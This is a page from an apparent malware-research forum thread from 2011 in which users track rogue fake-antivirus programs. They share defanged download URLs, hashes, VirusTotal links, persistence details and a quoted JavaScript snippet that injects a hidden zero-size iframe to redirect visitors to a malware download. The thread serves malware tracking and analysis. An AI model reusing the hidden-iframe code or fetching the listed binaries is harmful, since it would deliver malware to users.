Page 23 of 34

Re: Rogue antimalware (FakeAV, FakeAlert)

PostPosted:Thu Sep 08, 2011 7:19 pm
by Xylitol
Tracking Cyber Crime: Golden Ducat (AV Affil)
Security Shield sample in attach.

System Recovery

PostPosted:Mon Sep 12, 2011 2:07 pm
by bitx
System Recovery

Re: Rogue antimalware (FakeAV, FakeAlert)

PostPosted:Mon Sep 12, 2011 2:22 pm
by Xylitol
security shield fake scanner
Code: Select all
hXXp://oorvyvwdeciphers.info/fast-scan/
function who conduct to redirect page for malware download, with hidden message 'fuck nod32'
function black(){
var f = '<iframe ';
var u = 'src="black.php" ';
var c = 'style="';
var k = 'width: 0px; ';
var n = 'height: 0px; ';
var o = 'border: 0px;';
var d32 = '"></iframe>';
document.getElementById('frame').innerHTML = f+u+c+k+n+o+d32;
}

Windows Live Protect

PostPosted:Tue Sep 13, 2011 12:24 pm
by Maxstar
Windows Live Protect

(korean rogue)

http://www.virustotal.com/file-scan/rep ... 1315881296
MD5 : 4385fa9dd04fdff8c9e25a1e296fb456

Image

Data Recovery

PostPosted:Wed Sep 14, 2011 9:06 am
by bitx
Data Recovery

Re: Rogue antimalware (FakeAV, FakeAlert)

PostPosted:Fri Sep 16, 2011 7:29 am
by Xylitol
Code: Select all
hXXp://www.lamatita.info/eee/scan/
Fake scan page, with Koobface as payload.
http://www.virustotal.com/file-scan/rep ... 1316157525

in attach the fake scanner page without koobface
Image

Re: Rogue antimalware (FakeAV, FakeAlert)

PostPosted:Mon Sep 19, 2011 6:23 pm
by rough_spear
Hi All,
Fresh bunch of Fake AVs. 8-)

Web links -
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_se.exe
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_updater.exe
hxxp://dw.wideon.co.kr/WideOnSetup.exe
hxxp://dw.wideon.co.kr/Setup/binc/WindowSystem_uninstaller.exe
hxxp://soul-you.in/aslpatch10.exe
hxxp://down.vaccinescan.co.kr/app/partner_2010/vaccinescan_ancamera.exe
hxxp://update.speedboan.co.kr/bin/speedboan.exe
hxxp://update.speedboan.co.kr/bin/speedboanU.exe

Files :
WindowSystem_se.exe, WindowSystem_updater.exe, WideOnSetup.exe, WindowSystem_uninstaller.exe ===> 19-09-2011-FakeAVs-part01.7z

vaccinescan_ancamera.exe, speedboan.exe, speedboanU.exe ===> 19-09-2011-FakeAVs-part02.7z

aslpatch10.exe ===>19-09-2011-FakeAVs-part03.7z

Regards,


rough_spear. ;)

Re: Rogue antimalware (FakeAV, FakeAlert)

PostPosted:Wed Sep 21, 2011 4:36 pm
by rough_spear
Hi, ;)
One more Fake AV.

File name - ana.exe
size - 2.07 MB

Weblink :

hxxp://bluemig.de/ana.exe

Regards,


rough_spear. :D

Re: Rogue antimalware (FakeAV, FakeAlert)

PostPosted:Wed Sep 21, 2011 4:51 pm
by EP_X0FF
rough_spear wrote:Hi, ;)
One more Fake AV.
This is Total Protect FakeAV written on dot net.

It is aggressive - terminating starting application with fake virus warning alerts - usual behavior for this type of FakeAV.

Image

Runs from X:\Documents and Settings\UserName\Application Data\

via

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Re: Rogue antimalware (FakeAV, FakeAlert)

PostPosted:Wed Sep 21, 2011 4:57 pm
by markusg
i wrote abuse to strato (hoster) they are sending answer normaly in 24 hours.